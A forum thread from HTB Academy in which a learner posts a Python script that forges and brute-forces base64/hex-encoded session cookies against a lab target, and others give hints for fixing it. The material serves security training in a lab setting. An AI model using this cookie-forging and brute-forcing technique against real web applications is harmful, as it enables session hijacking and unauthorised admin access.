Bruteforcing Cookies - Broken Authentication

HTB Content Academy
1

Hi guys, I need some help for the first question of this section. Becuase I lost so many time to this bruteforcing attack over this cookie.

To begin, I create/modify the script of this section, and I added a fuctionality to read a wordlist file for solve this question. The script that I create/modify is the next:

from base64 import b64encode
from binascii import hexlify
import requests
import urllib.parse
from sys import exit

url = "http://ip_target:port/question1/"

now = 1648839247 
start = 1648839247 - 1000
flag = 0

with open('./wordlist.txt') as wd:
    for fline in wd:
        for x in range(start, now + 1000):
    
            cook_ = "user:htbadmin;role:{};time:{}".format(fline.rstrip(), x)    
            stp1 = hexlify(cook_.encode()).decode()
            stp2 = b64encode(stp1.encode()).decode()
            stp3 = urllib.parse.quote_plus(stp2)
    
            print('[+] Check encode cookie: {}'.format(cook_))
            cookie = {'SESSIONID': stp3}
            res = requests.get(url, cookies=cookie)   
    
            if 'Unfortunately' in res.text:
                flag = 1

            if flag == 0:
                print('[-] Valid Cookie found: {}'.format(stp3))
                exit()
            elif 'Login' in res.text:
                continue
            else:
                print('[!] Unexpected response - verify [!]')

I used ±10 min as timelapse for time generated admin cookie.

Another thing to mention, is I used ‘CommonAdminBase64.txt’ wordlist of seclists wordlist.And I apply content filter to this wordlist to get only valid string for bruteforce the value “role”. And as last mention, I used the string “Unfortunately” as reverse condition to know if the attack was successful.

I don’t know if the my script wrong or I used a wrong list. The problem is that for each bruteforce attack with this script, takes more time than target machine time live.
Anyone, can telling what I doning wrong? Or A hint to the correct wordlist?

2

Just to confirm are you on Bruteforcing Cookies or the Predictable Reset Token?

3

I’m on Bruteforcing Cookies section, I’ve already finished the Predictable Reset Token.

4

Ahhh yes you are correct, your script was throwing me off. It seems a little off. You don’t need to do anything for the time piece of the cookie. You are in the right folder for the wordlist.

Don’t go down the time rabbit hole. Focus on modifying that script to fit your needs, then try the different wordlists in that folder.

1 Like
5

DM me if you want help debugging and writing a new script, the one you posted can be salvaged. You just need to erase one of the loops and overhaul the encoding process. Then you might want to look at how you flag the right result. It shouldn’t be too burdensome.
-onthesauce

1 Like
6

I finally got it. Thanks a lot again, you really save me in the worst moments haha. The hint about the time doesn’t matter and the recommendation to check the coding process that was the clue. Other than the timing issue in the script, the URL encode was not needed.

7

No worries! I won’t lie Broken Authentication was my Kryptonite, it is definitely the one I struggled with the most. So I am happy to help get everyone through it. Glad you got it!
-onthesauce

1 Like
8

Question 1 made me so mad. HTB gives you the answer but they mentally mess with you hahaha.

1 Like
9

im am very stuck in this module, this makes no sense to me

could anyone dm me and teach me ? i need a suport